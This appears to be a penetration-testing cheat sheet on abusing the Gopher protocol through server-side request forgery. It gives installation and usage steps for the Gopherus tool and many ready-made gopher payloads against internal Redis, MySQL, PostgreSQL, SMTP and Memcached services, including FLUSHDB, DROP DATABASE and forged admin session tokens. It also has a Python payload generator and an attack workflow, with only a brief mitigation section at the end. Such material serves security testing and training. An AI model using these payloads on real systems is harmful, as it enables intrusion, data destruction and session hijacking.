Gopher Protocol
The Gopher protocol (RFC 1436) is a text-based internet protocol from the 1990s for document retrieval. While largely obsolete, it remains enabled on many servers and can be exploited via SSRF (Server-Side Request Forgery) to interact with backend services.
Gopher Protocol Basics
URL Format
gopher://host:port/type/selector/search/string
# Examples:
gopher://example.com/ # Directory listing
gopher://example.com/0/file # Text file
gopher://example.com/1/menu # Directory menu
gopher://example.com/7/search # Search queryGopher Item Types
| Type | Description |
|---|---|
| 0 | Text file |
| 1 | Gopher submenu/directory |
| 2 | CCSO Nameserver |
| 3 | Error |
| 4 | BinHexed Macintosh file |
| 5 | DOS binary archive |
| 6 | Unix uuencoded file |
| 7 | Gopher fulltext search |
| 8 | Telnet session |
| 9 | Binary file |
| + | Redundant server |
| T | TN3270 session |
| g | GIF image |
| I | Generic image |
SSRF via Gopher
Basic Gopher SSRF
# Test if SSRF exists
# Parameter that takes URLs: ?url=, ?uri=, ?redirect=
# Simple gopher access
gopher://localhost:6379/
gopher://127.0.0.1:3306/
# Access via SSRF
# Server fetches: gopher://internal-redis:6379/URL Encoding for SSRF
# Gopher URL requires proper encoding in SSRF context
gopher://127.0.0.1:6379/_QUIT
# Encoded for web parameter:
http://vulnerable.com/?url=gopher%3A%2F%2F127.0.0.1%3A6379%2F_QUIT
# Newline injection
gopher://127.0.0.1:6379/%0aGopherus Tool
Installation
# Clone gopherus repository
git clone https://github.com/tarunkant/Gopherus
cd Gopherus
# Make executable
chmod +x gopherus.py
# Python requirements
pip install -r requirements.txt
# Run
python gopherus.pyInteractive Mode
# Launch gopherus
python gopherus.py
# Select target service
# 1: Redis
# 2: MySQL
# 3: PostgreSQL
# 4: Memcached
# 5: MongoDB
# 6: SMTP
# 7: SSH
# Answer prompts to generate payloadService-Specific Exploitation
Redis SSRF Exploitation
# Gopherus - Redis option
python gopherus.py --exploit redis
# Generate command payload
# Input: FLUSHDB
# Output:
# gopher://127.0.0.1:6379/_FLUSHDB%0a
# Or manual Redis gopher
gopher://127.0.0.1:6379/_*2%0d%0a$4%0d%0aLLEN%0d%0a$4%0d%0aKEYS%0d%0a
# Redis commands via gopher:
# SET key value
gopher://target:6379/_SET%20key%20value%0a
# GET key
gopher://target:6379/_GET%20key%0a
# FLUSHDB (delete all)
gopher://target:6379/_FLUSHDB%0aMySQL SSRF Exploitation
# Gopherus - MySQL option
python gopherus.py --exploit mysql
# Login credentials (if default)
# user: root
# password: ""
# Generate payload
# Query: SELECT version();
# Output example:
# gopher://127.0.0.1:3306/...payload...
# Manual MySQL commands:
# SHOW DATABASES;
# SELECT * FROM information_schema.TABLES;
# SELECT @@version;PostgreSQL SSRF Exploitation
# Gopherus - PostgreSQL option
python gopherus.py --exploit postgres
# Database: postgres (default)
# User: postgres
# Password: ""
# Generate SQL injection payload
# Query: SELECT version();
# Execute commands:
# DROP DATABASE dbname;
# CREATE TABLE test(id INT);SMTP SSRF Exploitation
# Gopherus - SMTP option
python gopherus.py --exploit smtp
# Sender: attacker@internal.com
# Recipient: admin@internal.com
# Message: Malicious payload
# Manual SMTP via gopher:
gopher://mail.internal:25/_EHLO
gopher://mail.internal:25/_MAIL%20FROM%3A%20attacker@internal.com%0aMRCP...
# Send email via SSRF
# Bypass authenticationMemcached SSRF Exploitation
# Gopherus - Memcached option
python gopherus.py --exploit memcached
# Set cache value
# key: admin_session
# value: admin_token
# Manual memcached:
gopher://127.0.0.1:11211/_set%20admin_session%200%200%2012%0aadmin_token%0a
# Get value
gopher://127.0.0.1:11211/_get%20admin_session%0a
# Delete
gopher://127.0.0.1:11211/_delete%20admin_session%0aAdvanced Payload Generation
Custom Gopher Payload
# Python script to generate gopher payloads
import urllib.parse
def generate_gopher_payload(host, port, command):
# Format command with CRLF
payload = command.replace('\\n', '%0a')
gopher_url = f"gopher://{host}:{port}/_{payload}"
# URL encode for SSRF parameter
encoded = urllib.parse.quote_plus(gopher_url)
return f"http://vulnerable.com/?url={encoded}"
# Usage
redis_cmd = "FLUSHDB\n"
payload = generate_gopher_payload("127.0.0.1", 6379, redis_cmd)
print(payload)Chained SSRF Attacks
# SSRF to internal Gopher to Redis
# 1. Initial SSRF endpoint
# http://external-app.com/?url=gopher://internal:6379/FLUSHDB
# 2. Multiple commands
# Chaining multiple Redis commands via SSRF
# 3. Data exfiltration
# Use gopher to access data, exfiltrate via DNS/HTTPDetection and Prevention
Identifying Gopher Services
# Check if gopher port is open
nmap -p 70 target.com
# Connect to gopher service
nc -v target.com 70
# Check gopher service version
telnet target.com 70SSRF Mitigation
# Prevent gopher SSRF in application
validation:
- Whitelist allowed protocols: http, https only
- Block internal IP ranges: 10.0.0.0/8, 172.16.0.0/12, 192.168.0.0/16
- Disable gopher handler in libraries
- Validate resolved hostnames
- Rate limit URL requests
firewall:
- Block outbound gopher (port 70)
- Restrict to whitelisted destinations
- Monitor for suspicious patternsTesting Workflow
- Identify SSRF: Find URL parameters that fetch content
- Test protocols: Try gopher:// schema
- Determine service: Identify backend services on internal network
- Generate payload: Use gopherus to create exploit
- Execute: Inject gopher URL via SSRF
- Verify: Confirm command execution/data access
References
Last updated: 2026-03-30